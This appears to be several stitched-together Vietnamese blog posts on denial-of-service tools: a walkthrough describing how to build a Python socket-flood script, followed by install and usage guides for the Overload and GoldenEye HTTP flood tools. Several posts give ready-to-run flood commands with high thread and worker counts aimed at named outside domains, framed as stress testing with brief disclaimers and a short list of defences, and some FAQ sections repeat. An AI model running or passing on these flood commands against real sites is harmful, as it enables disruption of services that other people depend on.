Sau khi import xong, các bạn tiến hành trang trí giao diện cho tool, cái này trang trí cho đẹp, còn ai không thích trang trí có thể vào viết code luôn.

Các bạn nào muốn trang trí giống như mình thì có thể lên google gõ từ khóa figlet online rồi vào trang web bất kì để lấy mẫu.

Như các bạn thấy đấy, câu code os.system('cls') đây là dòng code thực thi lệnh trên cmd của hệ thống, khi các bạn chạy tool thì câu code này sẽ xóa hết tất cả các chữ hiện có trên cmd chỉ còn lại một mình dòng chữ DOS bự chà bá to ở dưới.

À mà còn 1 một vấn đề nữa là từ colored đây là 1 module của termcolor và các bạn để ý có những từ như ‘red’, ‘green’,….. ở cuối câu code thì đó là màu sắc của chữ mà bạn muốn in ra.

OK, vậy chúng ta sẽ thực hiện bước tiếp theo thôi:

Giờ chúng ta viết 1 đoạn code ngắn để lấy dữ liệu đầu vào của người dùng hay còn gọi là “input”.

Tại đây, các bạn có thể tạo 1 biến bất kì, rồi chúng ta sẽ lấy input của người dùng. 

Các bạn có thể thấy đấy,str là 1 chuỗi kí tự trong Python, nên vì các số IP thường có các chuỗi kí tự khác nhau được cách bởi dấu chấm nên mình đặt nó là ‘str’. Còn ‘int’ viết tắt là Integer là một kiểu dữ liệu, được sử dụng trong Python để biểu diễn các số nguyên.

Như vậy đã xong. Giờ mình sẽ tiến hành trang trí phần tấn công. Mình trang trí để nhìn cho bố đời, còn các bạn nào không thích thì bỏ qua cũng được.

Ok, đây chính là giao diện code khi tool hoạt động tấn công. Câu code đầu, câu code 2 và thư viện màu chữ mình cũng đã giải thích rồi nên thôi.

Giờ vào vấn đề quan trọng nhất cho tool hoạt động đây.

Các bạn tiến hành tạo cho mình một hàm và 2 biến bất kì như trong hình.

Tại đây mình tạo 1 hàm tên là syn() và 2 biến có tên là hevin và bb.

Các bạn thấy thấy biến 1. Mình đã gọi module random có sẵn trong Python và đã import nó ở bước đầu tiên, sau từ random là từ urandom , cả 2 đều là hàm băm ngẫu nghiên được cài đặt một bộ tạo số giả ngẫu nhiên và chứa các hàm cho phép chúng ta giải quyết trực tiếp nhiều vấn đề lập trình khác nhau sử dụng đến tính ngẫu nhiên. Còn về biến bb thì mình để số nguyên là 0.

Nào, các bạn hãy tạo cho mình 1 vòng lặp while True: đây là vòng lặp giúp 1 đoạn mã nào đó hoạt động lặp đi lặp lại cho đến khi mình muốn dừng thì thôi.

Giờ các bạn tạo 1 cặp try, except để bắt lỗi trong Python:

Đầu tiên mình tạo 1 biến có tên là h trong biến đó mình đã gọi module socket được tích hợp sẵn trong Python. Socket là các endpoint của một kênh giao tiếp hai chiều. Nó sử dụng để kết nối với một chương trình khác chạy trên một máy tính khác trên Internet. Một chương trình mạng có thể sử dụng nhiều socket cùng một lúc, nhờ đó nhiều chương trình có thể sử dụng Internet cùng một lúc.

Tiếp theo là h.connect đây là mình kết nối với ip và port của máy tấn công

Tiếp đến là h.send(hevin), mình dùng câu code này để gửi cho máy nạn nhân những thông số ngẫu nghiên từ 0 đến 900, như vậy là đủ rồi, còn các bạn nào muốn chỉnh cao hơn thì tùy ý.

Tiếp theo nữa :>>, chính là Hàm range() trong Python vốn được sử dụng để tạo ra một đối tượng chứa các phần tử là dãy số gồm các số liên tiếp từ 0 đến một giá trị, mà giá trị đó không vượt qua đối số được chỉ định mà các bạn đã tạo input cho người dùng nhập

Câu code tiếp theo thì mình đã giải thích lúc nãy rồi nhé bây giờ chúng ta sẽ giải thích bb+=1 nhé:

Câu code có thể được dịch là “thêm bất cứ thứ gì ở bên phải dấu += vào biến ở bên trái dấu +=.

Ví dụ. Nếu bạn cóa = 10 thì a += 5 sẽ là: a = a + 5

Vì vậy, “a” bây giờ bằng 15.

Còn phần in kia mình cũng đã giải thích như trên rồi

Chúng ta đến phần ‘except’ nào

Tại đây mình dùng KeyboardInterrupt để khắc phục lỗi khi dừng tool. Để tool dừng lại chúng ta nhấn tổ hợp phím Ctrl+C để dừng. Còn nếu bạn nào không thích thì các bạn dùng except:  thôi cũng được.

Đến phần h.close() mình đã gọi hàm close() để mỗi lần dừng lại thì tool sẽ ngừng chạy. Còn phần print(….) mình sẽ giải thích qua là mỗi khi bạn cho tool dừng lại thì sẽ hiện ra Done.

Đến phần cuối cũng thôi !!!!

Ở phần cuối là phần for i in range(thread) mình cũng đã giải thích cho các bạn như ở trên rồi nên bỏ qua

Tiếp đến 2 câu code cuối cũng, mình đã tiến hành gọi module threads được có sẵn trong Python đây là 1 module đa luồng. Như vậy ta có thể hiểu Thread là một đơn vị cơ bản trong CPU. Một luồng sẽ chia sẻ với các luồng khác trong cùng process về thông tin data, các dữ liệu của mình. Việc tạo ra thread giúp cho các chương trình có thể chạy được nhiều công việc cùng một lúc.

Không những vậy Python cung cấp thread Module và threading Module để bạn có thể bắt đầu một thread mới cũng như một số tác vụ khác trong khi lập trình đa luồng. Mỗi một Thread đều có vòng đời chung là bắt đầu, chạy và kết thúc. Một Thread có thể bị ngắt (interrupt), hoặc tạm thời bị dừng (sleeping) trong khi các Thread khác đang chạy – được gọi là yielding.

Tổng hợp Code DoS ở trên bạn có tải từ Github của mình. Nhưng mình khuyên bạn nên tập code theo hướng dẫn bên trên để hiểu hơn về Python thay vì tải sẵn về sử dụng, như vậy sẽ không nâng cao được kiến thức lập trình.

Cách sử dụng Tool:

Sau khi làm xong, các bạn mở cmd trên máy và trỏ đến tệp mà các bạn đã đặt (name).py rồi nhập lệnh

python (name).py

Lúc này giao diện tool của các bạn đã làm sẽ hiện trên màn hình cmd yêu cầu các bạn nhập các thông số: IP máy cần tấn công, Port ( cổng ) máy tính, Threads ( luồng tấn công ), Packet ( số lượng gói cần gửi ).

Kết Quả Tấn Công:

Như các bạn thấy đấy, mình nhập thông số vô cùng thấp nhưng kết quả của cuộc tấn công đạt hiệu quả rất cao. Các bạn lưu ý khi test trên chính máy của mình đấy =)). Mình để có hơn 5s máy mình đã lên đến 76% CPU rồi

VẬY LÀ MÌNH ĐÃ HƯỚNG DẪN CÁC BẠN XONG CÁCH VIẾT TOOL DOS BẰNG PYTHON. Hy vọng bạn sẽ bắt đầu tìm hiểu Python cơ bản với bài viết này. Mình mong các bạn không nên sử dụng tool Dos này vào mục đích xấu thay vào đó các bạn có thể nghiên cứu cách phòng chống và ngăn chặn nhé.

Tác giả: Van Son

Câu hỏi thường gặp

Tool này có thực sự là một công cụ DDoS không?

Không, tool này thực chất là một công cụ DoS (Denial of Service), chứ không phải DDoS (Distributed Denial of Service). Bài viết sử dụng thuật ngữ “DDoS” trong tiêu đề để thu hút người đọc, nhưng nội dung bài viết giải thích rõ ràng về điểm khác biệt.

Tôi có thể sử dụng tool này để tấn công các hệ thống khác không?

Không nên. Bài viết nhấn mạnh rằng tool này chỉ dành cho mục đích nghiên cứu và học hỏi. Sử dụng tool này để tấn công các hệ thống mà bạn không được phép truy cập là vi phạm pháp luật và có thể dẫn đến hậu quả nghiêm trọng.

Tool này hoạt động hiệu quả như thế nào?

Tool này hoạt động bằng cách gửi một lượng lớn các gói tin rác đến mục tiêu, làm quá tải hệ thống và gây ra tình trạng gián đoạn dịch vụ. Hiệu quả của tool này phụ thuộc vào cấu hình của máy chủ mục tiêu và mạng lưới của bạn. Nó hoạt động tốt hơn trong mạng LAN.

Tại sao phải thử sức chịu đựng website của bạn?

Mỗi một Website thì sẽ có các host khác nhau. Việc Website của bạn có khả năng chống chịu được đến bao nhiêu phụ thuộc hoàn toàn vào tài nguyên của host của Website. Khả năng Website có thể chịu được ảnh hưởng trực tiếp tới lượng người truy cập vào Website tại 1 thời điểm hay chính xác là liên quan trực tiếp tới số HTTP Request của trang Web

Nếu 1 trang web vượt quá số lượng HTTP request nó thì có thể gây ra gián đoạn trong việc truy cập website của người dùng hay cụ thể là bạn không thể kết nối tới trang Web. Khi đó máy chủ sẽ phản hồi với lỗi những lỗi 5XX. Các lỗi 5XX có thể gặp bao gồm: 500 tới 505.

Đối với những doanh nghiệp hay người dùng đều không muốn gặp vấn đề này và vì vậy việc kiểm tra sức chịu đựng của website của bạn là rất quan trọng. Trong bài viết này, mình sẽ sử dụng 1 tool Dos đơn giản với phương thức Request HTTP. Đối với anh em nào chưa biết Dos / DDos là gì thì có thể xem thêm bài: GoldenEye – Tool test sức chịu đựng website của mình tại đây nhé!

Một số lưu ý trước khi thực hiện

• Tuyệt đối không Dos / DDos Anonyviet và những Website bạn không thuộc quyền sở hữu hay quản lý. Anonyviet sẽ không chịu trách nhiệm với các hành vi phá hoại của các bạn.
• Overload là 1 tool nhẹ và chỉ sử dụng phương thức HTTP nên sẽ không gây ngốn tài nguyên máy như GoldenEye nhưng mình khuyến khích sử dụng mạng có đường truyền cao hay kết nối máy tính với Router thông qua dây mạng để đạt được hiệu quả cao nhất.

Nền tảng Tool có thể hoạt động

• Window
• Linux
• Termux

Hướng dẫn sử dụng Overload để thử sức chịu đựng của Website

Cài đặt Overload Trên Window

Bước 1: Các bạn cài đặt Python bản mới nhất tại đây.

Bước 2: Sau khi chạy xong, các bạn Click chuột phải vào MyPC và chọn Properties ->  Advanced system settings ->  Environment Variables  -> Tìm ở mục System variables phần Path -> click Edit -> Bấm new -> nhập dường dẫn của Python vào.

Hoặc các bạn có thể tich vào phần Add Python to PATH khi đang SetUp

Bước 3: Tải Tool DDoS Overload của 7zx tại đây.

Bước 4: Vào CMD hoặc Powershell, di chuyển vào thư mục vừa download

Bước 5: Ghi lệnh sau để tải PIP cần thiết:

pip install -r requirements.txt

Sử dụng DDOS Layer 7 Overload trên Linux

Lưu ý: các bạn nên cấp quyền Super User cho terminal nhé!

Bước 1: Các bạn cập nhật Linux bằng lệnh sau:

sudo apt update

Bước 2: Tải Python về Linux

sudo apt install python3 python3-pip git -y

Bước 3: Tải Overload từ github về sử dụng lệnh git

git clone https://github.com/7zx/overload

Đối với các bạn chưa có git thì có thể tải sử dụng câu lệnh sau

sudo apt install git-all

Bước 4: Các bạn vào thư mục của Overload bằng cách nhập

cd overload

Bước 5: Ghi lệnh sau để tải PIP cần thiết:

pip3 install -r requirements.txt

Nếu anh em chưa có PIP3 thì sử dụng câu lệnh sau đây để tải về

sudo apt-get update -y && sudo apt-get install python3-pip -y

Cài đặt DDos OverLoad trên Termux

Trước tiên, bạn cần có kiến thức về cài đặt và sử dụng Termux trên Android. Sau đó thực hiện các bước sau:

Bước 1: Các bạn cập nhật Termux bằng lệnh sau:

pkg update

Bước 2: Tải Python về Linux

pkg install python3 python3-pip git -y

Bước 3: Tải Overload từ github về sử dụng lệnh git

git clone https://github.com/7zx/overload

Bước 4: Các bạn vào thư mục của Overload bằng cách nhập

cd overload

Bước 5: Ghi lệnh sau để tải PIP cần thiết:

pip3 install -r requirements.txt

Sử dụng Overload

Cú pháp câu lệnh:
python3 overload.py [-h] [--target <URL>] [--method <HTTP>] [--time <time>]
[--threads <threads>]

Trong đó

-h hay –help : hiển thị mục help của overload

–target <URL>: mục tiêu mà bạn muốn nhắm tới

–method <HTTP>: kiểu tấn công

–time <giây>: Thời gian chạy tool

— thread <luồng>: số luồng trên giây <tối đa 200>

Ví dụ 

python3 overload.py --target vietnamconghoa.us --method HTTP --time 500 --thread 200

Trong câu lệnh vừa rồi mình sử dụng Max thread xem web mình còn sống không và sau đây là kết quả

Nhờ vậy mà mình biết là website của mình khá là dễ chết. Sau đây là cách để phòng chống các cuộc tấn công từ chối dịch vụ

Các cách để phòng chống DDOS / DOS

Biện pháp kĩ thuật

• Tăng cường khả năng xử lí hệ thống
• Tối ưu hóa thuật toán
• Nâng cấp máy chủ
• Nâng cấp băng thông
• Cài đặt đầy đủ các bản vá lỗi từ server
• Sử dụng tường lửa

Công cụ phòng chống DDOS

• Dùng hệ thống thiết bị, phần mềm hoặc dịch vụ giám sát an toàn mạng
• Dùng thiết bị bảo vệ mạng có dịch vụ chống tấn công DDoS
• Tường lửa cứng hoặc tường lửa mềm

Vậy là Anonyviet vừa hướng dẫn các bạn cách test khả năng chịu đựng của website bằng tool DDOS Layer 7 overload đồng thời cách phòng chống Dos / Ddos. Các bạn có ý tưởng gì thì hãy đừng ngần ngại mà hãy gửi ngay cho anonyviet.com@gmail.com nhé.

Câu hỏi thường gặp

Overload là gì và nó hoạt động như thế nào?

Overload là một công cụ đơn giản để thử nghiệm sức chịu tải của website bằng cách gửi nhiều yêu cầu HTTP. Nó mô phỏng một cuộc tấn công DDoS Layer 7 ở mức độ nhẹ để đánh giá khả năng chịu đựng của website trước lượng truy cập lớn.

Tôi có thể sử dụng Overload để tấn công website của người khác không?

Không. Việc sử dụng Overload để tấn công website mà bạn không sở hữu hoặc quản lý là bất hợp pháp và có thể dẫn đến hậu quả nghiêm trọng. Chỉ sử dụng công cụ này để kiểm tra website của riêng bạn.

Làm thế nào để bảo vệ website của tôi khỏi các cuộc tấn công DDoS?

Bạn cần nâng cấp máy chủ và băng thông, tối ưu hóa mã nguồn, sử dụng tường lửa, và cân nhắc sử dụng các dịch vụ bảo vệ DDoS chuyên nghiệp. Việc thường xuyên cập nhật bản vá lỗi bảo mật cũng rất quan trọng.

Bạn có thể điều chỉnh số lượng kết nối DoS vào Server dựa trên tham số worker và socket. Từ đó có thể kiểm tra xem Web mình chịu tải được bao nhiêu.

Dos / DDos là gì?

Dos (viết tắt của Denial-of-service) là một dạng tấn công máy hoặc mạng, khiến cho chúng không còn khả năng sử dụng dựa theo nguyên lí của tắc nghẽn traffic hay vượt quá sức chịu đựng của 1 máy chủ hoặc mạng. Những đối tượng thường bị tấn công là những website , máy chủ server , mạng ,….

• GoldenEye tạo ra một lượng lớn truy cập cùng lúc vào Website khiến Server không chịu tải nổi dẫn đến Website sẽ ngưng hoạt động.
• Dấu hiệu để biết Website bị sập hay chưa là người dùng không thể truy cập được Web hoặc hiển thị không thể kết nối đến database.

Đối với Webmaster có thể dùng cronjob để kiểm tra thường xuyên Website có bị sập không, nếu có thì tự khởi động lại các dịch vụ.

1 số lưu ý trước khi thực hiện

• Không DoS AnonyViet và các Website không phải của bạn quản lý
• Những kiểu Dos này rất tốn tài nguyên máy tính, vì vậy hãy sử dụng cho vừa đủ và đừng để overload máy tính. Bài viết chỉ mang tính chất nghiên cứu vậy nên hãy sử dụng tool này như 1 tool test website bạn hay website bạn có thể tấn công chứ đừng phá hoại website người khác.

Chuẩn bị

• Một máy tính chạy Linux (nếu chạy window có thể tải link ở đây)
• Python3 (xem hướng dẫn tải cho window và linux)

Hướng dẫn Dos website bằng GoldenEye

Mở Terminal lên vào thực hiện các lệnh sau:

Tải GoldenEye về máy tính

git clone https://github.com/jseidl/GoldenEye

Vào thư mục GoldenEye

cd GoldenEye/

Cú pháp câu lệnh

python3 goldeneye.py <url> [tùy chọn]

Tùy chọn :

•  – u : useragent (mặc định: tự tạo
•  – w : worker (mặc định: 50)
•  – s : socket (mặc định: 30)
•  – m : method (post , get , random)
•  – d : debug (mặc định : false)
•  – n : nosslcheck (mặc định : true)
•  – h : help

Ví dụ của bài :

python3 goldeneye.py https://duocphamviethung.com.vn/ -w 1000 -s 1000 -m post

(Đây là trang của người quen nhờ Check giùm)

Khi GoldenEye thông báo như này là nó đã chạy rồi nhé

Và kết quả đây:

Một số Server cấu hình mạnh sẽ chặn IP của bạn, tốt nhất để biết Web sập hay chưa bạn nên dùng 1 IP khác để truy cập thử hoặc kiểm tra tại check-host.net.

Và đó là cách sử dụng GoldenEye để Dos website. Hãy để lại bình luận ở dưới để mình biết ý kiến của mọi người nhé. Hãy xem thêm bài viết MHDDoS – Tool DDOS Attack với 36 kiểu tấn công hot tại đây.

Câu hỏi thường gặp

GoldenEye có an toàn khi sử dụng không?

GoldenEye là công cụ để kiểm tra khả năng chịu tải của website. Chỉ sử dụng GoldenEye trên website hoặc server mà bạn sở hữu. Sử dụng GoldenEye trái phép có thể vi phạm pháp luật.

Tôi cần những gì để sử dụng GoldenEye?

Bạn cần một máy tính (Linux hoặc Windows), Python 3 được cài đặt và kết nối internet.

Làm thế nào để tôi biết website đã bị tấn công thành công?

Website sẽ không phản hồi hoặc hiển thị lỗi kết nối. Bạn nên sử dụng một IP khác để kiểm tra hoặc sử dụng dịch vụ kiểm tra trạng thái website như check-host.net để xác nhận.